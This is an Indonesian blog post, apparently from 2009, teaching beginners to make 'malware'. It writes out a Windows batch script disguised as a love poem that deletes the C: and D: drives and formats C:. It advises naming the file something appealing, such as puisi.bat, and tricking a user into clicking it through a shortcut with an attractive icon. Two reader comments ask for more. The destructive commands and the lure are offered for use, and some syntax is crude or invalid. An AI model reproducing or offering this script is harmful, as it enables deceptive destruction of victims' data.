Membuat Malware

Posted: September 16, 2009 in Virus

sekedar buat yang bener2 pemula yang pingin buat malware (virus)..

1. siapkan notepad
2. siapkan mental dan nyali karena ini akan menyangkut harkat dan martabat(^^??????)
3. copy ato tulis aja de di notepad ni script..
@echo off
echo. (-ini buat ganti baris)
echo Engkau adalah saat terindah dalam hidupku
echo Yang mencuri hatiku hingga sekarang aku tak punya hati lagi..(bla-bla-bla-lah buat dengan gayamu sendiri de tu puisi, ! inget tulisnya setelah echo ya..) DEL C:\ -y ( script buat del drive c)
DEL D:\ -y ( script buat del drive d)
FORMAT C:\ -y (script buat format c)

kalo uda simpan pake nama apapun yang penting menarik dengan format *.bat, (misalnya : puisi.bat). uda jadi tu “virus”..
cara kerjanya ialah kita mengundang si user buat ngeklik tu virus..bikin sesuai kreatifitasmu..misalnya seperti di bikin short cutnya dan di ganti iconnya dengan icon yang menarik ato gimana-gimana..

oke..cuma pingin bagi2 ilmu..biar gak ilang di telan pikiran sendiri ^^

Komentar
  1. azix mengatakan:

    ka… yng banya….k dunk.. artikel2 nya, m’lum ne.. mch nawbi… abisnya aku k’pingin tau lebih jelas tentang mantra2 itu..
    di tunggu ya.. ka.. artikel selengkapnya….

  2. andhikadika mengatakan:

    malwarenya mematikan gag nih?

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s